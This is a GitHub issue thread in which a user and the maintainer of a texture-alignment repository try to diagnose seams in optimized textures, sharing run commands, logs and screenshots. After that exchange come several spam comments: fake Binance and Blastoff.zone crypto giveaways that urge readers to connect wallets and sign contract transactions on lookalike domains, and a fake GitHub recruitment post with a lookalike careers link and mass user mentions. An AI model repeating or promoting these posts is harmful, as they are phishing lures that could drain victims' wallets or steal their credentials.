### ISSUE TITLE
There are seams in optimized result

### ISSUE THREAD

**Issue by Woolseyyy** [Xiaoming-Zhao/advtex_init_align#9]
Hi, Xiaoming! Thanks a lot for helping me with dealing with my custom data.
I visualize the optimized result in `${SCENE_ID}/optimized_texture_test_1_10` after training  but find that there are seams in optimized results. I check the log and donnot find any error message. I donnot know it is the normal case or I do something wrong. 
Looking forward to your suggestions.

Visualization results in `${SCENE_ID}/optimized_texture_test_1_10` of scene_04 and my custom data:
![image](https://user-images.githubusercontent.com/19527291/206447871-f3c768d7-d636-4f7d-a049-acf51bfa747d.png)
![image](https://user-images.githubusercontent.com/19527291/206447909-9b103149-179f-40f5-904a-9f3f72a3e0a8.png)

**Comment by Xiaoming-Zhao** [comment]
Hi Haoqian, glad the code is runnable on your own data.

The results look weird to me. I re-ran and cannot reproduce your results for `scene_04`. I upload my experiment results [here](https://drive.google.com/drive/folders/1ceHqUroGa5iRpdXcSPvhEInxVp9omILe?usp=sharing).

I recommend the following:
1. Run commands in `run.sh` one by one.
2. Compare your results to the one I uploaded.

Hope this can help pinpoint the issue.

**Comment by Woolseyyy** [comment]
Hi Xiaoming, thank you for the detailed suggestions!
I look into my results following your suggestions and find that the issue may be caused by TextInit step, i.e., the second command of run.sh:
```
export OMP_NUM_THREADS=10 && \
        ${MRF_BIN} \
        --data_dir ${EXP_DIR}/${SCENE_ID}/${DIR_PREFIX}_1_${sample_freq} \
        --debug 0 \
        --debug_mesh_shape 0 \
        --align_arg_max ${UNARY} \
        --n_iter_mp ${N_ITERS_MP} \
        --n_workers 10 --mtl_width ${MTL_RES} --mtl_height ${MTL_RES} \
        --n_extrude_pixels 0 \
        --iter_subdiv ${N_SUBDIV} --stream_type 1 \
        --unary_potential_dummy ${DUMMY_PENALTY} \
        --remesh 0 \
        --bin_pack_type 3 --n_areas_per_plate_bin_pack 500 \
        --debug_mesh_shape 0 --conformal_map 1 --compact_mtl 1 --top_one_mtl 1 \
        --penalty_face_area ${FACE_AREA_PENALTY} \
        --penalty_face_cam_dist ${DEPTH_PENALTY} \
        --penalty_face_v_perception_consist ${PERCEPT_PENALTY} \
        --pair_potential_mp 1 \
        --pair_potential_off_diag_scale_depth 0 \
        --pair_potential_off_diag_scale_percept 0
```

I find that my result in `output_obj_argmax_1024_1024_500` have bad quality and some mtl files are subdivided further.

my mtl files:
![image](https://user-images.githubusercontent.com/19527291/206613638-a44716d5-a27c-4e60-9abd-2ad5fbf06a0e.png)

your mtl files:
![image](https://user-images.githubusercontent.com/19527291/206613688-d3df9ef9-0c81-4a08-a587-4808404d749c.png)

my tex init result (`test_1_10/output_obj_argmax_1024_1024_500/TexAlign.obj`):
![image](https://user-images.githubusercontent.com/19527291/206613834-74163b0e-3490-4c41-aecd-ab3c38ae1483.png)

yours:
![image](https://user-images.githubusercontent.com/19527291/206613895-c1d26430-3bfc-46df-b04c-be7df6862468.png)

It looks like the seams are caused by those subdivided areas. 
Would you like to share the log? Maybe I could check the log to find out the reason. Here is my [log](https://github.com/Xiaoming-Zhao/advtex_init_align/files/10191492/scene_04.log)

**Comment by Xiaoming-Zhao** [comment]
Hi Haoqian, please see my [run.log](https://github.com/Xiaoming-Zhao/advtex_init_align/files/10191897/debug_run.log).

I have a rough scan, it seems like most of the values in the log are identical except those mtl images you mentioned.

I am not pretty sure what the reason is. From your screenshot, it seems like you run the program on Windows. It this is the case, maybe the difference is due to precisions of `float` or `double` are different on Windows and Linux. If it is possible, may I know whether you could run the program on some unix systems?

**Comment by Woolseyyy** [comment]
I run on ubuntu server, but check the resuts on windows.

**Comment by Xiaoming-Zhao** [comment]
Thanks for the clarification. I changed another server and still could not reproduce the issue. They are both ubuntu 18.04 and GCC 7.5 though.

I am sorry but I have no concrete thoughts why this happened. I will keep you updated if I spot something later.

**Comment by Woolseyyy** [comment]
OK. Thank you for the detailed suggestions. I'll let you know if there's any progress.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by jorarportal** [comment]
# Binance

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by dsudduth** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
noodanee, @whbjzzwjxq, @siner9586, @jabolsoft, @mekza, @sigridjineth, @appsplash99, @mustang2247, @0x7869616F, @chayeoi, @stephanoulaa, @leodpena, @dbstratta, @rafaelbressan, @dangerousfood, @secretfader, @RobertDS07, @massa142, @Aloneposix, @dyba

**Comment by naudachu** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
542180864, @JawenChuang, @dubuqianxing, @hmxh, @hejiaji, @tulip0768, @xikw, @rensiqi7, @xkumabear, @zddhub, @zh1phy, @yzh990918, @lzwcaptain, @DAppDevelop, @happy-astrouant, @xueqinghua, @jiangsir404, @Jermic, @yujianFresh, @mli9502, @killomsc, @lxy1062539038, @js0exp, @nav1ce, @xsjzn, @peng1027, @speedand, @nkwh, @williamHappy, @younth, @geniusgao, @aohonze, @nearsmile, @tweinyan, @Fity, @Madq92, @xiuchanghu, @makang117, @dongqisilent, @aveyuan, @afredlyj, @huangsanyeah, @Hoooward, @zhzhl202, @yaye729125, @dongfangx, @C-9-N, @blakeyzhang, @lin-yuxiang, @LucasGuo-project
